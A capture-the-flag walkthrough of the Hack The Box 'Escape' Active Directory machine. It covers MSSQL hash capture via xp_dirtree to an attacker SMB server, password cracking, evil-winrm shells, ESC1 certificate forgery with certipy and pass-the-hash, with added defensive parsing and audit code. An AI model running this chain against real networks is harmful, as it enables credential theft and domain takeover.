Description
Escape is a medium Hack The Box machine that features:
- A PDF file on an accessible SMB share that reveals MSSQL credentials
- Capture and cracking of the MSSQL service account's NTLM (NetNTLMv2) hash to elevate privileges
- User pivoting via credentials leaked in a log file
- Privilege escalation by impersonating the Administrator user through the ESC1 vulnerability in a certificate template of Active Directory Certificate Services
Footprinting
First, we check with the ping command whether the machine is up and which operating system it runs. The target machine IP address is 10.10.11.202.
$ ping -c 3 10.10.11.202
PING 10.10.11.202 (10.10.11.202) 56(84) bytes of data.
64 bytes from 10.10.11.202: icmp_seq=1 ttl=127 time=48.8 ms
64 bytes from 10.10.11.202: icmp_seq=2 ttl=127 time=47.2 ms
64 bytes from 10.10.11.202: icmp_seq=3 ttl=127 time=47.4 ms
--- 10.10.11.202 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 47.214/47.808/48.765/0.683 ms
The machine is up, and the TTL of 127 (128 minus one hop) indicates a Windows host. Now we run an Nmap TCP SYN scan to find the open ports.
$ sudo nmap 10.10.11.202 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.202
Host is up (0.049s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 4.35 seconds
We get many open ports, the set typical of an Active Directory Domain Controller.
Enumeration
Then we run a more detailed scan of those ports with service version detection and the default scripts.
$ nmap 10.10.11.202 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.202
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.21 seconds
The services confirm an Active Directory environment: the sequel.htb domain and its Domain Controller dc.sequel.htb. We add both names to our local /etc/hosts file.
$ echo "10.10.11.202 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.10.11.202 dc.sequel.htb" | sudo tee -a /etc/hosts
Enumerating the SMB server, we find that we can list the shares with the Guest account and an empty password.
$ smbclient -L '//sequel.htb/' -U 'Guest%'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
We can read the Public share, and from it we retrieve the SQL Server Procedures.pdf file.
$ smbclient '//sequel.htb/Public' -U 'Guest%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1464393 blocks available
smb: \> get SQL Server Procedures.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \SQL
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (201,6 KiloBytes/sec) (average 201,6 KiloBytes/sec)
We read the file:
SQL Server Procedures
Since last year we've got quite few accidents with our SQL Servers (looking at you Ryan, with your instance on the DC, why should
you even put a mock instance on the DC?!). So Tom decided it was a good idea to write a basic procedure on how to access and
then test any changes to the database.
...
Accessing from non domain joined machine
Accessing from non domain joined machines can be a little harder.
The procedure is the same as the domain joined machine but you need to spawn a command prompt and run the following
command: cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password> . Follow the other steps from
above procedure.
If any problem arises, please send a mail to Brandon (mailto:brandon.brown@sequel.htb)
...
Bonus
For new hires and those still waiting for their users to be created and perms assigned, you can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1.
Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".
From this document we extract a few details about the MSSQL service. Three domain users are mentioned: Ryan, Tom and Brandon (account brandon.brown). There is also a shared account called PublicUser with the default password GuestUserCantWrite1. We log in to the MSSQL service with this account.
$ impacket-mssqlclient 'PublicUser:GuestUserCantWrite1'@sequel.htb
...
SQL (PublicUser guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
Exploitation
We start an SMB server with the impacket-smbserver tool to try to capture an NTLM authentication from the Microsoft SQL Server.
$ impacket-smbserver -smb2support share .
Now we run the xp_dirtree stored procedure with a UNC path pointing at our newly created SMB server, so the SQL Server service account connects to it and authenticates.
SQL (PublicUser guest@master)> xp_dirtree \\10.10.14.16\a
subdirectory depth file
------------ ----- ----
We get the NetNTLMv2 hash of the MSSQL service account, sequel\sql_svc.
$ impacket-smbserver -smb2support share .
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,60805)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:3e5d8762ddf06884b89d2ef5e8414a4c:010100000000000000ef65662b40dc019b5fb1420407d8de00000000010010004c005400420051006c00710076004c00030010004c005400420051006c00710076004c000200100069007300730048007a007900650047000400100069007300730048007a007900650047000700080000ef65662b40dc0106000400020000000800300030000000000000000000000000300000792dd6e46bf26fef3f2513bc38c7342183e7a41865b471078d13fb23fbeb64ab0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310036000000000000000000
[*] Closing down connection (10.10.11.202,60805)
[*] Remaining connections []
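To see what such a capture actually carries, here is an added parser (not part of the original writeup) that splits the john/hashcat-style line printed above and decodes its NTLMv2_RESPONSE blob as laid out in MS-NLMP; the hash line is the one captured above, split into pieces for width. It exposes the timestamp, the client challenge, the server names impacket advertised and the SPN the DC's SMB client authenticated to, and shows why the value is a cracking target rather than a pass-the-hash credential: NTProofStr is an HMAC over both challenges.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line captured above by impacket-smbserver (split here for width).
HASH_LINE = (
    "sql_svc::sequel:aaaaaaaaaaaaaaaa:3e5d8762ddf06884b89d2ef5e8414a4c:"
    "010100000000000000ef65662b40dc019b5fb1420407d8de00000000"
    "010010004c005400420051006c00710076004c00030010004c005400420051006c00710076004c00"
    "0200100069007300730048007a007900650047000400100069007300730048007a00790065004700"
    "0700080000ef65662b40dc010600040002000000"
    "0800300030000000000000000000000000300000792dd6e46bf26fef3f2513bc38c73421"
    "83e7a41865b471078d13fb23fbeb64ab0a00100000000000000000000000000000000000"
    "0900200063006900660073002f00310030002e00310030002e00310034002e0031003600"
    "0000000000000000"
)
# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR); ids 1-5 and 9 carry UTF-16LE strings.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
UTF16_IDS = {1, 2, 3, 4, 5, 9}

def filetime_to_datetime(ft):  # FILETIME: 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_netntlmv2(line):
    # john/hashcat layout: user::domain:server_challenge:NTProofStr:NTLMv2_RESPONSE blob
    user, _, domain, server_challenge, nt_proof, blob_hex = line.split(":")
    blob = bytes.fromhex(blob_hex)
    info = {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof_str": nt_proof,  # HMAC-MD5 keyed from the NT hash over both challenges
            "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
            "client_challenge": blob[16:24].hex(), "av": {}}
    off = 28  # RespType, HiRespType, reserved, timestamp, client challenge, reserved
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0 or av_id not in AV_NAMES or off + av_len > len(blob):
            break  # MsvAvEOL reached (or a malformed blob)
        raw = blob[off:off + av_len]
        off += av_len
        if av_id in UTF16_IDS:
            value = raw.decode("utf-16-le")
        elif av_id == 7:
            value = filetime_to_datetime(struct.unpack("<Q", raw)[0])
        else:
            value = raw.hex()
        info["av"][AV_NAMES[av_id]] = value
    return info
```

Calling parse_netntlmv2(HASH_LINE) yields a TargetName of cifs/10.10.14.16, the attacker-controlled host the service account was coerced to authenticate to; that SPN, and the timestamp, are what an investigator pulls from a capture like this.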
We crack it with John the Ripper and the rockyou wordlist.
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:03 DONE 0.2702g/s 2893Kp/s 2893Kc/s 2893KC/s RENZOJAVIER..RAHFIYAW
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We find the password of the sql_svc service account: REGGIE1234ronnie. We can open an interactive shell over WinRM with the evil-winrm tool.
$ evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
...
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
Post-Exploitation
In C:\Users we find another user with a profile on the system, Ryan.Cooper.
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
In the C:\sqlserver\logs directory we find the ERRORLOG.BAK file. It records a failed login for the Ryan.Cooper user, immediately followed by a failed login for a user named NuclearMosquito3 from the same client. That looks like a password typed by mistake into the username field.
*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
...
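The same reasoning can be turned into a detection over the MSSQL ERRORLOG. This is an added example, not part of the original writeup; the log excerpt and the list of known logins are constructed (the real ERRORLOG pads the source column with spaces, which the page collapsed), and the suspected value is masked before reporting so the alert itself does not spread the secret.

```python
import re
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt: the lines shown above, plus an unrelated failure.
ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 14:02:11.10 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 192.0.2.10]
"""
FAILED = re.compile(r"^(?P<ts>\S+ \S+)\s+Logon\s+Logon failed for user '(?P<user>[^']+)'"
                    r".*\[CLIENT: (?P<client>[^\]]+)\]")
# Logins that legitimately exist (constructed list); compared case-insensitively.
KNOWN_LOGINS = {"sequel.htb\\ryan.cooper", "sequel.htb\\sql_svc", "publicuser", "sa"}

def failed_logons(log_text):
    events = []
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events

def suspect_credential_leaks(log_text, window=timedelta(seconds=5)):
    """Flag an unknown 'user' that directly follows a failed logon for a real account
    from the same client within `window`: the pattern of a password typed as a username."""
    hits = []
    events = failed_logons(log_text)
    for prev, cur in zip(events, events[1:]):
        known_before = prev[1].lower() in KNOWN_LOGINS
        unknown_now = cur[1].lower() not in KNOWN_LOGINS
        if known_before and unknown_now and prev[2] == cur[2] and cur[0] - prev[0] <= window:
            hits.append({"time": cur[0], "account": prev[1], "client": cur[2],
                         "leaked_value": cur[1]})
    return hits

def redact(value):
    """Mask the suspected secret before it goes into a ticket or SIEM alert."""
    return value[0] + "*" * (len(value) - 2) + value[-1] if len(value) > 2 else "***"
```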
We try the Ryan.Cooper username with the NuclearMosquito3 password to open a new interactive shell.
$ evil-winrm -i sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
...
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
We are logged in as ryan.cooper. Since the Nmap scan showed the services presenting an SSL certificate, we enumerate the domain for Certificate Authorities and vulnerable templates as a privilege escalation path.
$ certipy-ad find -username Ryan.Cooper@sequel.htb -password 'NuclearMosquito3' -vulnerable -stdout
...
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
...
CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
...
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
The domain is using Active Directory Certificate Services. We find the ESC1 vulnerability in the UserAuthentication template of the sequel-DC-CA CA. ESC1 is the classic AD CS misconfiguration that can lead directly to privilege escalation: a certificate template is inadequately secured, so a low-privileged user can request a certificate and, crucially, specify an arbitrary identity in the certificate's SAN. That certificate can then be used to impersonate any user, including administrators.
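As an added example (not certipy's own code), this audit function evaluates the ESC1 conditions over a template's attributes as they would be read from LDAP; the attribute names and flag bits are those documented in MS-CRTD, and the UserAuthentication values are constructed to match what certipy reported above, since the page does not show the raw attributes. harden() shows the smallest change that closes the finding.

```python
# ESC1 triage over certificate-template attributes (added example, not certipy's code).
# Attribute names and flag bits follow MS-CRTD.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag (manager approval)
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_checks(template):
    """Return {condition: bool}; the template is ESC1-vulnerable only if all are True."""
    ekus = set(template["pKIExtendedKeyUsage"])
    enrollers = {p.split("\\")[-1] for p in template["enrollment_rights"]}
    return {
        "published_and_enabled": bool(template["certificate_authorities"]) and template["enabled"],
        "enrollee_supplies_subject": bool(
            template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template["msPKI-RA-Signature"] == 0,
        "client_auth_eku": not ekus or bool(ekus & CLIENT_AUTH_EKUS),  # no EKU = any purpose
        "low_priv_can_enroll": bool(enrollers & LOW_PRIV_GROUPS),
    }

def is_esc1(template):
    return all(esc1_checks(template).values())

def harden(template):
    """Smallest fix: let the CA build the subject from the requester's AD object."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed

# Constructed attribute values consistent with certipy's report on UserAuthentication
# above (the page does not show the raw LDAP attributes).
USER_AUTHENTICATION = {
    "name": "UserAuthentication", "enabled": True, "certificate_authorities": ["sequel-DC-CA"],
    "msPKI-Certificate-Name-Flag": 0x00000001, "msPKI-Enrollment-Flag": 0x00000000,
    "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                          "SEQUEL.HTB\\Enterprise Admins"],
}
```

Requiring manager approval or removing Domain Users from the enrollment rights closes the finding just as well; the audit reports which condition changed.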
Exploiting it takes two steps: request a certificate from the vulnerable template with the identity of a privileged target in the SAN, then use the obtained certificate to authenticate as that target. First we need the SID of the domain's Administrator user, since the certificate has to carry the target's SID for the DC to accept the mapping.
$ certipy-ad account -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip '10.10.11.202' -user 'Administrator' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=sequel,DC=htb
name : Administrator
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
sAMAccountName : Administrator
userAccountControl : 1114624
whenCreated : 2022-11-18T17:11:51+00:00
The SID is S-1-5-21-4078382237-1492182817-2568127209-500. Now we request the certificate for the target user.
$ certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip '10.10.11.202' -target 'sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'Administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
The certificate is saved in the administrator.pfx file. Now we authenticate against the DC with it to obtain a TGT and retrieve the NTLM hash.
$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
We get the KRB_AP_ERR_SKEW error because our machine's clock is not in sync with the target's (Kerberos rejects requests when the skew exceeds a few minutes, and the Nmap scan already reported a skew of about 8 hours). We sync our clock with the target over NTP.
$ sudo timedatectl set-ntp off
$ sudo rdate -n sequel.htb
We retry the previous command.
$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
We get the NTLM hash of the Administrator account, a52f78e4c751e5f5e17e1e9f3e58f4ee. We can re-enable time synchronisation on our machine and log in over WinRM by passing the hash. We are the Administrator user.
$ sudo timedatectl set-ntp on
$ evil-winrm -i sequel.htb -u Administrator -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
With the Administrator account we can retrieve the user.txt and root.txt flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Ryan.Cooper\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>